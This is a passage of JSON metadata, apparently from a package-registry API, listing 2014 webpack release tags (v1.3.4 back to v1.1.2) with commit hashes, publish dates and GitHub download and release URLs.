.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4/manifests"},{"name":"v1.3.3-beta2","sha":"2a419ccbeab05d91a9f14fa6ac1e2037678d8f29","kind":"commit","published_at":"2014-08-14T09:34:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2/manifests"},{"name":"v1.3.3-beta1","sha":"5a447ad7c39b63c037f56daf6df7d1df9074d1c8","kind":"commit","published_at":"2014-08-03T19:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1/manifests"},{"name":"v1.3.2-beta9","sha":"a7d7c4ca2fb245d22fa98944d32acfff4746ac44","kind":"commit","published_at":"2014-07-28T22:15:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9/manifests"},{"name":"v1.3.2-beta8","sha":"18ad6548134d5ff40fd04633e8e1375ddb005cc1","kind":"commit","published_at":"2014-07-26T15:54:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8/manifests"},{"name":"v1.3.2-beta7","sha":"0dd1a69b97161df01a6bdd41d5f32bb4135af50a","kind":"commit","published_at":"2014-07-26T12:48:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7/manifests"},{"name":"v1.3.2-beta6","sha":"7f6f44df1bb9ca055ac0eaed89aa0dca4e8dc6fa","kind":"commit","published_at":"2014-07-24T15:54:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6/manifests"},{"name":"v1.3.2-beta5","sha":"cca21ee10756dbb8edb6fb283391f304a197295f","kind":"commit","published_at":"2014-07-24T13:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5/manifests"},{"name":"v1.3.2-beta4","sha":"8d90c0f5b5998ebaf3e61ac443ec01a223d456e9","kind":"commit","published_at":"2014-07-23T12:42:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4/manifests"},{"name":"v1.3.2-beta3","sha":"d76600101ccc5aef0be148909a336baf3d2ccfce","kind":"commit","published_at":"2014-07-19T12:35:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3/manifests"},{"name":"v1.3.2-beta2","sha":"9d4cbb125445f4c2bb99c5b55a16c3255ae1d247","kind":"commit","published_at":"2014-07-18T11:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2/manifests"},{"name":"v1.3.2-beta1","sha":"0ab5a3e993386b54afab416b5bc02747658469e6","kind":"commit","published_at":"2014-07-17T00:06:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1/manifests"},{"name":"v1.3.1-beta9","sha":"53c38582e6ceb31aefab5237b042148dd6712151","kind":"commit","published_at":"2014-07-16T18:57:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9/manifests"},{"name":"v1.3.1-beta8","sha":"6c50e7c3883ac24c4f3dcd7b8a11f9545c230589","kind":"commit","published_at":"2014-07-09T11:37:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8/manifests"},{"name":"v1.3.1-beta7","sha":"287984cb54ed896c85778dc1874ec05195b99a11","kind":"commit","published_at":"2014-07-07T11:22:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7/manifests"},{"name":"v1.3.1-beta6","sha":"5113a81dd9cdbf35cb104e50480b4c858105b795","kind":"commit","published_at":"2014-07-04T11:02:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6/manifests"},{"name":"v1.3.1-beta5","sha":"197d2f2efa9e42836efe3f0f62c04c58b981a745","kind":"commit","published_at":"2014-07-02T22:00:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5/manifests"},{"name":"v1.3.1-beta4","sha":"68cc2c6e03d1326bc0c69cab5b1faf7145e1e195","kind":"commit","published_at":"2014-06-23T22:46:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4/manifests"},{"name":"v1.3.1-beta3","sha":"93beeacdf8e45970349006dc589c8e73b013e832","kind":"commit","published_at":"2014-06-18T21:03:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3/manifests"},{"name":"v1.3.1-beta2","sha":"af55e54271c5961e6d1bf57b485f5a5463bb5a7f","kind":"commit","published_at":"2014-06-18T09:12:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2/manifests"},{"name":"v1.3.1-beta1","sha":"8c2327e0b7863853a45ef094dbb8ded520e0314f","kind":"commit","published_at":"2014-06-17T20:46:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1/manifests"},{"name":"v1.3.0-beta9","sha":"419eb4dfd9d7ed8ad16688874e33bbe57617e2d8","kind":"commit","published_at":"2014-06-17T20:40:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9/manifests"},{"name":"v1.3.0-beta8","sha":"d3db09f72066ee23ec241f33ad6dfb00d42e8582","kind":"commit","published_at":"2014-06-12T04:31:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8/manifests"},{"name":"v1.3.0-beta7","sha":"46a918f5682ec766bc21424311f16fe28bcd8892","kind":"commit","published_at":"2014-06-11T20:52:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7/manifests"},{"name":"v1.3.0-beta6","sha":"20ad2baf9afd6a8d4e969e9ee094994c7b11905b","kind":"commit","published_at":"2014-06-11T20:26:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6/manifests"},{"name":"v1.3.0-beta5","sha":"8bfb752c526ef612b2011c7bc266b7adb7a8fcb7","kind":"commit","published_at":"2014-06-05T17:54:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5/manifests"},{"name":"v1.3.0-beta4","sha":"56e7073abbfec4b920bf1dffb0924027072d0c4e","kind":"commit","published_at":"2014-06-05T07:31:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4/manifests"},{"name":"v1.3.0-beta3","sha":"5cfd4138d682139af7069342aa66e0495070db9b","kind":"commit","published_at":"2014-06-04T06:48:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3/manifests"},{"name":"v1.3.0-beta2","sha":"560762a932475e21e68577ba33f9482d738f1edc","kind":"commit","published_at":"2014-06-03T06:45:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2/manifests"},{"name":"v1.3.0-beta1","sha":"ebac371b7228a04fab834260208d157c5333df0f","kind":"commit","published_at":"2014-06-02T22:19:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1/manifests"},{"name":"v1.2.0-beta6","sha":"fc6d418e3d5bd0bc6356e82850173c33c52a567a","kind":"commit","published_at":"2014-05-27T09:54:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6/manifests"},{"name":"v1.2.0-beta5","sha":"2b6bfde9d5d634e47558c6f6b8589622a1fb6062","kind":"commit","published_at":"2014-05-26T21:54:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5/manifests"},{"name":"v1.2.0-beta4","sha":"4ead6596a9a96dcde6f827ce1dce77c36701f113","kind":"commit","published_at":"2014-05-26T10:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4/manifests"},{"name":"v1.2.0-beta3","sha":"36803b52719fa8f07d21c5fbab90f26a8b1f2bed","kind":"commit","published_at":"2014-05-22T10:17:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3/manifests"},{"name":"v1.2.0-beta2","sha":"8ddfa0a950520306bb8694071d168a0d2a7a18a2","kind":"commit","published_at":"2014-05-21T16:34:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2/manifests"},{"name":"v1.2.0-beta1","sha":"943a17c027279833e03a1b62fa60417cf4a5a5ac","kind":"commit","published_at":"2014-05-21T05:49:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1/manifests"},{"name":"v1.1.11","sha":"2898f870eaeefcf0b60885743df8da9362883d63","kind":"commit","published_at":"2014-05-16T23:00:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11/manifests"},{"name":"v1.1.10","sha":"7824ed8e29961197f3d74a755820f7b31fa01b5b","kind":"commit","published_at":"2014-05-08T16:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10/manifests"},{"name":"v1.1.9","sha":"613e6a0bd0b4ca24791d01b3131b98533e33ff3a","kind":"commit","published_at":"2014-05-08T07:35:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9/manifests"},{"name":"v1.1.8","sha":"adf3108a785630cd46daff093a80eb78f507a3a5","kind":"commit","published_at":"2014-04-19T19:36:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8/manifests"},{"name":"v1.1.7","sha":"0ed9c759926ac0f7ec9be10643522657c6b4af53","kind":"commit","published_at":"2014-04-17T07:56:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7/manifests"},{"name":"v1.1.6","sha":"504cb48e8fbd298fc6fa89f4fce99f30f8c072d1","kind":"commit","published_at":"2014-04-17T06:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6/manifests"},{"name":"v1.1.5","sha":"32df8b73092c4fb59965f14ff833dfe70ba4940e","kind":"commit","published_at":"2014-04-09T07:12:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5/manifests"},{"name":"v1.1.4","sha":"d6aa7b1388a3fe4b1a3b146a4986bb2b5ea99d03","kind":"commit","published_at":"2014-04-05T16:11:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4/manifests"},{"name":"v1.1.3","sha":"5dcf54c1d4885d50625d799625c14123fd412fe1","kind":"commit","published_at":"2014-04-03T17:47:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3/manifests"},{"name":"v1.1.2","sha":"fece5aee86748f0f230176aa25d9a7334e91be3d","kind":"commit","published_at":"2014-03-31T09:33:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":n